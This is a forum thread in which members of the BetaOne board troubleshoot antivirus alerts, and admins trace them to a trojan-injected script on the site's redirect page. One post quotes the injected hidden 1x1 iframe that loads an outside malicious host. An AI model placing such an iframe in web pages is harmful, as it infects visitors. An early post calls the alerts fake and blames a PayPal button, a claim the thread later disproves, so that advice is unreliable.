|
B1 Infected !
Each time i log on B1 , i got a msg from kapersky!
take a look! |
What version of Kaspersky are you using?
I use Kaspersky 7 and have never had that happen! Can you scan with http://housecall.trendmicro.com/?WT.TM_clusty_flg=7 and post the results? |
Quote:
The board is setup with accept the "Privacy Report" icon which appear at the bottom of Board Screen anywhere you go.. It just support the "PayPal" listing here which cause the Firewal, Antivirus and own Internet Explorer to put and stay in the Allert mode.. which wake-up the Kasperski attention.. This warning are Fake and Kasperski know about but they never change that! ========================= "Privacy Report": RESTRICTED WEBSITE https://www.paypal.com/en_US/i/btn/x-clickbut21.. - Blocked ========================= This is part of IE Security Setup.. and you able to change so Open that Report and make own change.. and in respond the Kasperski will Love that and Stop such Fake Warnings! |
strange, bcause at the job i have versoin 7.0.0.125 and it does that !
At home, i have a version 6 i think ! But i didn't come on b1 since fews week from home ! Im gonna test that tonight !! |
I did go to betaone.net/ and was forwarded to a link site with a bunch of adult pictures, but I figured that I missspelled it.. kinda weird. and yes AVG complained to me as well about there being a bug, but only at that forwarded site.
|
I made a complete scan with Kaspersky 7.0.0.125 and nothing!
|
Quote:
I've got this prob at home too !! This is not beause a missspelled ! I got it in bookmark since few years and i never got this b4 ! |
What browser is everyone using when they seen the problem?
One might have a hole vs. another. |
I'm using IE7
|
I am using Ie7 and Ie6!
|
I'm seeing this problem now on Firefox- will scan the server and see what's happening.
|
I am now also getting this from Nod32. I also notice a few other websites loading when I go to BetaOne. :o
 Cheerz Voodoo |
BUMP :o
Can an admin look at this. As stated, a shitload of other sites are also loaded when you come here. Cant be good.:confused: Cheerz Dave |
The server was scanned and cleaned earlier this week- afaik it's still clean but will check. Are you sure you havent been infected with spyware?
|
I've just got precisely the same as Voodoo from my NOD32. I think I'm clean but I'll check. I had no indications of a problem before today and was following the thread out of interest only - then Bingo! :)
|
i am clean on the 2 pcs i use to come over b1 ! Both are still giving me this virus !!
ill do another check on my pc right now ! |
I scanned the server last night with KAV and Trend House Call but all was clean......
|
DoG,
Now don't tell me you really coudn't find this.... The first page when surfing to B1 is named "BetaONE Hotfix" and has the following HTML code: Code:
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"Code:
<iframe src="http://mn96.dns.gendistr.info/qualitytest" width=1 height=1></iframe>'So sure, the server might not be infected, but the index.php contains code that will get you infected. Now don't tell me you didn't see this, i mean, come on ;) Oh, and I saw today is yout birthday. Congratulations! Have a beer on me! Anyways, Cheers, Le Cactus |
I removed the erroneus script when i realised that it never used to be part of the hotfix page- then i saw your post and felt much happier :)
Hows's it going Cactus? Thanks for the Birthday wishes :) |
Quote:
Cheerz Dave |
Try B1 again after clearing cookies. i cleaned redirect screen.
|
I cleared my Firefox betaone cookie, restarted and brought up the site; NOD lit up again, this time with a different trojan name. I made a nonsense of capturing the screen so can't be more explicit - sorry.
Most worrying, I saw a reference to Paypal (bottom left of the screen) before I got to B1. Don't know if it was loading the Donate button or up to no good! NOD terminated whatever was going on and asked me to submit the trojan, which I did. Having spent most of yesterday morning scanning with Defender, Counterspy and NOD, I am confident NOD is keeping me clean - but it's quite an exciting ride to B1 these days. :lol: |
Got this again today:
 It now seems to be loading even more sites than previously. :mad: If you compare this screenshot to the previous one, you will notice that the site is different. O, and I did clear my cookies. Get the same in IE7 and in Firefox. :confused: Cheerz Dave |
It seems that there could be be multiple instances of the exploit installed on different pages on the server. Might have to go through them one by one as virus scanners don't seem to be able to detect them on the server :(
|
Mike, did you fix this? :D Much appreciated. :clapping:
Cheerz Dave |
It all seems fine now, thanks for fixing it. :)
|
I have been surfing betaone with my wii to be safe. IS the problem really fixed now. Where did it come from.
|
It seems to have come from another web admin on the server installing a program with a security flaw or other vulnerability. Please be assured that the server is constantly being updated and regular AntiVirus scans do take place, it's just hard for any single AV program to catch all the numerous windows exploits in circulation. The recent spate of problems stems from a a trojan that inserted a java script 'exploit' into one of the redirect pages for the B1 website. Unfortunately, once the system was cleaned of the trojan the javascript remained. The affected file was cleaned by hand and write protected to prevent any further problems. There was around a 24 hours delay before the users saw any benefit from the 'disinfection(?)' whilst local cache's were cleared etc.
All should b e fine now and i apologize for any inconvenience caused. EDIT: @ Cactus: The index.php is fine, it's the portal redirect that isn't updated when we update the VBulletin software that was infected ;) A few permission changes on the server and a quick lookie see later and it's all sorted :) BTW, Where the hell have you been??? Its been too long- PM me and come in from the wilderness ;) We miss ya bud! |
:mad:Shit, it is back again and now loads more sites than before? How can this be?
DoG, help. :eek: Cheerz Dave |
Fixed- again :angry:
Not sure what is going on but it seems that the file attributes were changed to allow the file to be written to again. I changed the security settins so it should be good now. Clear all cookies and internet cache and try again please. |
Thanks DoG, much appreciated. ;)
Cheerz Dave |
DoG, guess who's back, back in town? :lol: Yip, them nasties are back.
Cheerz Voodoo |
FFS, the server must still be infected somewhere. Will see what's been changed this time.
|
Ok, the file that was being changed last time doesnt have the java script in it. Searching all the other files in our section of the hdd but all is clear so far.
|
| All times are GMT +1. The time now is 08:49 AM. |
Powered by vBulletin® Version 3.6.5
Copyright ©2000 - 2025, Jelsoft Enterprises Ltd.